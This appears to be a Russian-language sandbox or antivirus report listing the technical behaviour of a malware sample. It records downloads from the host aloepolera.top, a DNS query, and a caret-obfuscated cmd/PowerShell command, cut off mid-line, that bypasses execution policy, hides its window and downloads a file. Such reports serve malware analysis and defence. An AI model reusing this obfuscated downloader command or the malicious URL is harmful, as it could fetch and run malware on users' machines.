Техническая информация
- http://aloepolera.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "Po^w^erS^h^eLl^.exe^ -E^Xe^C^utIOnPOliC^Y ^b^yPAsS^ -No^Pro^fiLE -w^in^DO^wsTyL^e H^idDen (^n^ew^-^O^bjeCt s^yS^T^em.^net^.^W^EB^clieN^T).DoWNlO^Adf^iL^e^('http://aloepolera...
- %APPDATA%.exe
- 'al###olera.top':80
- http://al###olera.top/read.php?f=#####
- DNS ASK al###olera.top
- '<SYSTEM32>\cmd.exe' /c "Po^w^erS^h^eLl^.exe^ -E^Xe^C^utIOnPOliC^Y ^b^yPAsS^ -No^Pro^fiLE -w^in^DO^wsTyL^e H^idDen (^n^ew^-^O^bjeCt s^yS^T^em.^net^.^W^EB^clieN^T).DoWNlO^Adf^iL^e^('http://aloepolera...' (со скрытым окном)